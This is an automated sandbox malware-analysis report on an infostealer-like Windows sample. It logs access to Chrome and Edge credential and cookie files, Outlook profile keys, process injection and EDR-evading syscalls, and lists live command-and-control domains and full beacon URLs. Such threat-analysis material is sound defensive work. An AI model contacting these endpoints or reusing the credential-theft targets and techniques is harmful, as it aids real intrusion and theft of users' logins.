                Source: Yara matchFile source: 00000007.00000002.4584186845.0000000004A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2516129694.0000000007F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4584164680.0000000003FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2513521514.0000000004F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4579324178.0000000000B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4582371287.0000000003230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: SecuriteInfo.com.FileRepMalware.20173.21714.exeBinary or memory string: WIN_XP
                Source: SecuriteInfo.com.FileRepMalware.20173.21714.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
                Source: SecuriteInfo.com.FileRepMalware.20173.21714.exeBinary or memory string: WIN_XPe
                Source: SecuriteInfo.com.FileRepMalware.20173.21714.exeBinary or memory string: WIN_VISTA
                Source: SecuriteInfo.com.FileRepMalware.20173.21714.exeBinary or memory string: WIN_7
                Source: SecuriteInfo.com.FileRepMalware.20173.21714.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.4590001024.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2512560372.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4584186845.0000000004A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2516129694.0000000007F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4584164680.0000000003FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2513521514.0000000004F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4579324178.0000000000B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4582371287.0000000003230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS16
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets141
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                1
                Masquerading
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                Virtualization/Sandbox Evasion
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
                Process Injection
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1549831 Sample: SecuriteInfo.com.FileRepMal... Startdate: 06/11/2024 Architecture: WINDOWS Score: 100 28 yourwebbuzz.net 2->28 30 www.seraph.best 2->30 32 21 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 3 other signatures 2->48 10 SecuriteInfo.com.FileRepMalware.20173.21714.exe 1 2->10         started        signatures3 process4 signatures5 60 Writes to foreign memory regions 10->60 62 Maps a DLL or memory area into another process 10->62 64 Switches to a custom stack to bypass stack traces 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 HJizhlDIjKVk.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 control.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 HJizhlDIjKVk.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.jivatop.online 185.179.189.193, 50011, 50013, 50014 WEBHOST1-ASRU Russian Federation 22->34 36 www.plyvik.info 67.223.117.142, 50003, 50004, 50005 VIMRO-AS15189US United States 22->36 38 5 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                SecuriteInfo.com.FileRepMalware.20173.21714.exe42%ReversingLabsWin32.Trojan.Generic
                SecuriteInfo.com.FileRepMalware.20173.21714.exe43%VirustotalBrowse
                SecuriteInfo.com.FileRepMalware.20173.21714.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                trifecta.center0%VirustotalBrowse
                yourwebbuzz.net0%VirustotalBrowse
                spencermarcu.movie1%VirustotalBrowse
                whiteshieldinsure.org0%VirustotalBrowse
                SourceDetectionScannerLabelLink
                https://www.jivatop.online/lander/kac-sdelat-zapechennie-ovoshchi-v-tri-raza-vcusnee/?keyword=0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/portit-zhizn-blizcim-i-collegam--obnarodovana-otvratitelnaya-privi0%Avira URL Cloudsafe
                http://www.college-help.info/wm94/?08rl=7kS6gWg4TGPkiMLuCHnIHRTQ3qYM06eaigrXILamhmyeZN//hX0ZBV/Jvv1z6XxjKqArJvf1S0/GIkuUkrvXIITmY0x+We/Q9CJ8aFTCC7CnYVlt7PWp/pqkdTJVVi6hLa/q3Tk=&IrPLc=Knb4R0%Avira URL Cloudsafe
                http://www.yourwebbuzz.net/84o5/0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/vot-chto-vam-nuzhno-pit-ot-vseh-virusov-i-bolezney/?keyword=0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/v-bashcirii-prostilis-s-pervim-prezidentom-respublici-murtazoy-rah0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/yaponsciy-hudozhnic-sozdaet-stseni-v-miniatyure-iz-edi/?keyword=0%Avira URL Cloudsafe
                http://www.papampalli.shop/m9ej/0%Avira URL Cloudsafe
                http://www.seraph.best/dse0/0%Avira URL Cloudsafe
                http://www.yourwebbuzz.net0%Avira URL Cloudsafe
                http://www.gucciqueen.shop/0g3j/0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/meriya-zavershila-provercu-v-ryazanscoy-shcole-------62-posle-scan0%Avira URL Cloudsafe
                http://www.trifecta.center/r0lv/?IrPLc=Knb4R&08rl=RQL5uypvFlMwQi2GLIId0mZrz/SGN6i+q5FrzH0xA9hYrhUAdlgXlQAJmAAoJGPgrNgV6jvxdXCBcEDPMJZTV+2H43d2bqABGV4siYI9WteDJE2TAna2JNgpF+cMEoE2aLQ71LA=0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/ridala-pryamo-na-stsene--v-seme-semenovich-strashnoe-gore/?keyword0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/kac-prigotovit---copeechniy---sup--retsept--cotoriy-ostalsya-s-sov0%Avira URL Cloudsafe
                http://www.scottlasher.org/qfli/?08rl=AhjJgGShipZbwfgYBrBs/D/6J4md1mWyL0Dn1+DGXWSLPyEvzD8Lt8QIg++AaZimhExVJRS0A24jbF5v5l0xXr0xTbRwbZ4D/8YFIQmCxUZGKyC9Et+i1GoSGLb+TRIhDWVWAYM=&IrPLc=Knb4R0%Avira URL Cloudsafe
                http://www.seraph.best/dse0/?IrPLc=Knb4R&08rl=8iHtcJIG/+RIWBvECvIOVB8mvr8kzBU7qmWzhsUPOht4KTOzG0/L7NLTG/7/XZMHEoTZ0gMQWo8dRZRzp2QjseON87NIWLv0fW4/6GkG2GuzRp6o1iE2qd+7VCEw8b7pInbsgMs=0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/nazvani-polza-i-vred-gorcogo-shocolada/?keyword=0%Avira URL Cloudsafe
                http://www.trifecta.center/r0lv/0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/pochemu-nelzya-varit-zamorozhennoe-myaso--blyudo-budet-beznadezhno0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/v-minfine-rasscazali-pensioneram-ob-ih-unicalnom-prave/?keyword=0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/spetsialisti-obyasnili-nepotrebnoe-povedenie-anastasii-volochcovoy0%Avira URL Cloudsafe
                http://www.1daysober.com/q5gi/0%Avira URL Cloudsafe
                http://www.whiteshieldinsure.org/3fus/?IrPLc=Knb4R&08rl=N37/9h28dFqTFTbynIc+O1znseVxHIXZE7DXniB1wngIxlCrnEyOGvsAdKxjrp67etIg8JUbEYHl+7CXxm3m2jtEXrZrKAlhk2xQwbijvW4W0bJjguvuk21AJD3IIpJr9ZOXnsQ=0%Avira URL Cloudsafe
                http://www.plyvik.info/yhso/0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/giteley-kamchatci-oscorbili-slova-yacubovicha-v-efire---pole-chude0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/kac-pomoch-dozret-fructam-i-ovoshcham-v-domashnih-usloviyah/?keywo0%Avira URL Cloudsafe
                http://www.yourwebbuzz.net/84o5/?08rl=FhnoB6sXlwwUJ2S0xbdNJQGNi52zNHIg2XWwnAKV1i9NMjPku/WS5PsHH4WgPI0VJn/Y1dNZFJ1NDQC+U2kAsgQSVBacTkqlvkMhlEkshTZpF7vS/ppR4Ym+5wvF5WrQLwolbC4=&IrPLc=Knb4R0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/v-moscve-16-letniy-podrostoc-umer-ot-redcoy-formi-bessonnitsi/?key0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/chistaya-eczotica--civi-uluchshaet--ucreplyaet--raduet/?keyword=0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/yurist-rasscazal-o-sposobe-poluchat-dve-pensii/?keyword=0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/budet-ili-net-dopolnitelnaya-pensiya--pensioneram-razyasnili-situa0%Avira URL Cloudsafe
                http://www.6686vi38.app/e6d9/0%Avira URL Cloudsafe
                http://www.spencermarcu.movie/sgqz/?IrPLc=Knb4R&08rl=z40UQA4uEilCXXdlmYjF9n5vKa/i580zo4gniHRlmWBqOO2Mc3/KIA1Ve2y+wPMV5ve5FEwYeJdlmAqR+Re6XDDxkmNjF6zWKZUvC2ZhY9W/S87H8cuWRnBzaMg+4CPVpmh1XXg=0%Avira URL Cloudsafe
                http://www.plyvik.info/yhso/?IrPLc=Knb4R&08rl=qshK0E1CF4G1Sir9YwhfIyIJsH40nusxx8ay40x9lBPpumonqOgOHkS7CUCTyeg3KaY3G5xJAfwXsCu9cW8WruEAiYD2w0a2Z1Gg4cekeTUI2P7TVw+M8wQ7uq12F63bSznXgbg=0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/pensii-pereschitayut--budet-drugoy-razmer-rabotayushchim-pensioner0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/vot-chto-budet-s-vashim-organizmom--esli-ne-pit-alcogol-1-mesyats/0%Avira URL Cloudsafe
                http://papampalli.shop/m9ej/?08rl=gfUsZufFmKDBP/wr4I3wawh27yThqd6e8DgUc02Caz1AXZo67KCVFRTwEz2BahWw7X0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/razvarivaetsya-vermishel-v-supe--cacaya-hitrost-pomozhet-ispravit-0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/v-moscve-nashli-mumifitsirovannoe-telo-zvezdi---papinih-dochec---i0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/slegshemu-drobotenco-vizvali-vrachey-posredi-nochi--chto-sluchilos0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/--zanovo----lolita-zagovorila-o-vozvrashchenii-c-tsecalo/?keyword=0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/kac-bolit-golova-pri-raznih-zabolevaniyah/?keyword=0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/kogda-solit-varenuyu-cartoshcu/?keyword=0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/zametno-po-rucam--vrach-nazvala-dva-neozhidannih-priznaca-tsirroza0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/na-rublevce-delyat-nasledstvo-churicovoy--na-usadbu-uzhe-nashelsya0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/pensionerov--u-cotorih-est-stazh-20-let--zhdet-bolshoy-syurpriz/?k0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/myaso-budet-tayat-vo-rtu--vot-chto-opitnie-culinari-dobavlyayut-v-0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/endocrinolog-nazvala-sposobi-uluchsheniya-potentsii/?keyword=0%Avira URL Cloudsafe
                http://www.gucciqueen.shop/0g3j/?08rl=NUHSu4JJ/Kg1VJPQXLy5z6m/27O+diehBYTKyfkdb4Gb1jUS0BQgTHwq/v5TPkjaPgaSjERVsEgj0/u2pw6ETGFSwQcSpI7WWZojw8+UmAVwwTMD/Kk0887QkMTIKRMf3/bI2Cw=&IrPLc=Knb4R0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/--lyublyu-----67-letnyaya-dolina-publichno-priznalas-v-chuvstvah-z0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/gotovitsya-za-minutu--a-hvalyat-ves-vecher--cac-prigotovit-shicarn0%Avira URL Cloudsafe
                http://www.college-help.info/wm94/0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/kac-svarit-i-podat-c-stolu-pelmeni-v-bulone--retsept--cac-v-restor0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/yurist-predupredila-rossiyan-o-risce-poteryat-imushchestvo/?keywor0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/noviy-podhod-pomozhet-bolee-effectivno-borotsya-s-racom/?keyword=0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/--polnoe-obezdvizhivanie----vrach-rasscazal--chto-proishodit-s-per0%Avira URL Cloudsafe
                http://www.1daysober.com/q5gi/?08rl=Qxz+9oQawQanAQHYdTYz9C9Qi+WU18FrCJDOUV5r+dn1dNZo7gMQdwRJpVqmN4EEk1WeYDWgHj4103TlxFaSFaPEmGUQsOZ0B0zIPDTJhKA7TnEqTx18z1JHq5v0eXuzQE4RJLA=&IrPLc=Knb4R0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/endocrinolog-rasscazala-ob-antivozrastnoy-yagode-dlya-pozhilih/?ke0%Avira URL Cloudsafe
                http://www.whiteshieldinsure.org/3fus/0%Avira URL Cloudsafe
                http://www.jivatop.online/gls1/0%Avira URL Cloudsafe
                http://www.scottlasher.org/qfli/0%Avira URL Cloudsafe
                http://www.seraph.best/0%Avira URL Cloudsafe
                http://www.papampalli.shop/m9ej/?08rl=gfUsZufFmKDBP/wr4I3wawh27yThqd6e8DgUc02Caz1AXZo67KCVFRTwEz2BahWw7XHlSefPEEQngnWsZ2+57h2QZ8Rh1TFPGeT9177P1cahfBJtA0MilqntdvK9z/bAGtCFsek=&IrPLc=Knb4R0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/v-pravitelstve-viscazalis-o-vvedenii-novogo-vihodnogo-dnya-v-rossi0%Avira URL Cloudsafe
                https://www.jivatop.online/lander/pochemu-colichestvo-sahara-nuzhno-socratit/?keyword=0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                trifecta.center
                3.33.130.190
                truetrueunknown
                yourwebbuzz.net
                3.33.130.190
                truetrueunknown
                spencermarcu.movie
                3.33.130.190
                truetrueunknown
                whiteshieldinsure.org
                3.33.130.190
                truetrueunknown
                1daysober.com
                3.33.130.190
                truetrue
                  unknown
                  6686vi38.app
                  3.33.130.190
                  truetrue
                    unknown
                    www.college-help.info
                    38.88.82.56
                    truetrue
                      unknown
                      www.jivatop.online
                      185.179.189.193
                      truetrue
                        unknown
                        papampalli.shop
                        162.241.85.94
                        truetrue
                          unknown
                          gucciqueen.shop
                          178.79.184.196
                          truetrue
                            unknown
                            www.seraph.best
                            52.20.84.62
                            truetrue
                              unknown
                              scottlasher.org
                              3.33.130.190
                              truetrue
                                unknown
                                www.plyvik.info
                                67.223.117.142
                                truetrue
                                  unknown
                                  www.whiteshieldinsure.org
                                  unknown
                                  unknownfalse
                                    unknown
                                    www.1daysober.com
                                    unknown
                                    unknownfalse
                                      unknown
                                      www.trifecta.center
                                      unknown
                                      unknownfalse
                                        unknown
                                        www.gucciqueen.shop
                                        unknown
                                        unknownfalse
                                          unknown
                                          www.scottlasher.org
                                          unknown
                                          unknownfalse
                                            unknown
                                            www.6686vi38.app
                                            unknown
                                            unknownfalse
                                              unknown
                                              www.papampalli.shop
                                              unknown
                                              unknownfalse
                                                unknown
                                                www.spencermarcu.movie
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  www.cybermisha.store
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    www.yourwebbuzz.net
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.seraph.best/dse0/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.yourwebbuzz.net/84o5/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.college-help.info/wm94/?08rl=7kS6gWg4TGPkiMLuCHnIHRTQ3qYM06eaigrXILamhmyeZN//hX0ZBV/Jvv1z6XxjKqArJvf1S0/GIkuUkrvXIITmY0x+We/Q9CJ8aFTCC7CnYVlt7PWp/pqkdTJVVi6hLa/q3Tk=&IrPLc=Knb4Rtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.papampalli.shop/m9ej/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.gucciqueen.shop/0g3j/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.scottlasher.org/qfli/?08rl=AhjJgGShipZbwfgYBrBs/D/6J4md1mWyL0Dn1+DGXWSLPyEvzD8Lt8QIg++AaZimhExVJRS0A24jbF5v5l0xXr0xTbRwbZ4D/8YFIQmCxUZGKyC9Et+i1GoSGLb+TRIhDWVWAYM=&IrPLc=Knb4Rtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.trifecta.center/r0lv/?IrPLc=Knb4R&08rl=RQL5uypvFlMwQi2GLIId0mZrz/SGN6i+q5FrzH0xA9hYrhUAdlgXlQAJmAAoJGPgrNgV6jvxdXCBcEDPMJZTV+2H43d2bqABGV4siYI9WteDJE2TAna2JNgpF+cMEoE2aLQ71LA=true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.seraph.best/dse0/?IrPLc=Knb4R&08rl=8iHtcJIG/+RIWBvECvIOVB8mvr8kzBU7qmWzhsUPOht4KTOzG0/L7NLTG/7/XZMHEoTZ0gMQWo8dRZRzp2QjseON87NIWLv0fW4/6GkG2GuzRp6o1iE2qd+7VCEw8b7pInbsgMs=true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.trifecta.center/r0lv/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.1daysober.com/q5gi/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.plyvik.info/yhso/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.whiteshieldinsure.org/3fus/?IrPLc=Knb4R&08rl=N37/9h28dFqTFTbynIc+O1znseVxHIXZE7DXniB1wngIxlCrnEyOGvsAdKxjrp67etIg8JUbEYHl+7CXxm3m2jtEXrZrKAlhk2xQwbijvW4W0bJjguvuk21AJD3IIpJr9ZOXnsQ=true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.yourwebbuzz.net/84o5/?08rl=FhnoB6sXlwwUJ2S0xbdNJQGNi52zNHIg2XWwnAKV1i9NMjPku/WS5PsHH4WgPI0VJn/Y1dNZFJ1NDQC+U2kAsgQSVBacTkqlvkMhlEkshTZpF7vS/ppR4Ym+5wvF5WrQLwolbC4=&IrPLc=Knb4Rtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.6686vi38.app/e6d9/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.spencermarcu.movie/sgqz/?IrPLc=Knb4R&08rl=z40UQA4uEilCXXdlmYjF9n5vKa/i580zo4gniHRlmWBqOO2Mc3/KIA1Ve2y+wPMV5ve5FEwYeJdlmAqR+Re6XDDxkmNjF6zWKZUvC2ZhY9W/S87H8cuWRnBzaMg+4CPVpmh1XXg=true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.plyvik.info/yhso/?IrPLc=Knb4R&08rl=qshK0E1CF4G1Sir9YwhfIyIJsH40nusxx8ay40x9lBPpumonqOgOHkS7CUCTyeg3KaY3G5xJAfwXsCu9cW8WruEAiYD2w0a2Z1Gg4cekeTUI2P7TVw+M8wQ7uq12F63bSznXgbg=true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.gucciqueen.shop/0g3j/?08rl=NUHSu4JJ/Kg1VJPQXLy5z6m/27O+diehBYTKyfkdb4Gb1jUS0BQgTHwq/v5TPkjaPgaSjERVsEgj0/u2pw6ETGFSwQcSpI7WWZojw8+UmAVwwTMD/Kk0887QkMTIKRMf3/bI2Cw=&IrPLc=Knb4Rtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.college-help.info/wm94/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.jivatop.online/gls1/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.1daysober.com/q5gi/?08rl=Qxz+9oQawQanAQHYdTYz9C9Qi+WU18FrCJDOUV5r+dn1dNZo7gMQdwRJpVqmN4EEk1WeYDWgHj4103TlxFaSFaPEmGUQsOZ0B0zIPDTJhKA7TnEqTx18z1JHq5v0eXuzQE4RJLA=&IrPLc=Knb4Rtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.whiteshieldinsure.org/3fus/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.scottlasher.org/qfli/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.papampalli.shop/m9ej/?08rl=gfUsZufFmKDBP/wr4I3wawh27yThqd6e8DgUc02Caz1AXZo67KCVFRTwEz2BahWw7XHlSefPEEQngnWsZ2+57h2QZ8Rh1TFPGeT9177P1cahfBJtA0MilqntdvK9z/bAGtCFsek=&IrPLc=Knb4Rtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://duckduckgo.com/chrome_newtabcontrol.exe, 00000007.00000002.4591356745.0000000008008000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://duckduckgo.com/ac/?q=control.exe, 00000007.00000002.4591356745.0000000008008000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.yourwebbuzz.netHJizhlDIjKVk.exe, 00000009.00000002.4590001024.00000000056E6000.00000040.80000000.00040000.00000000.sdmpfalse
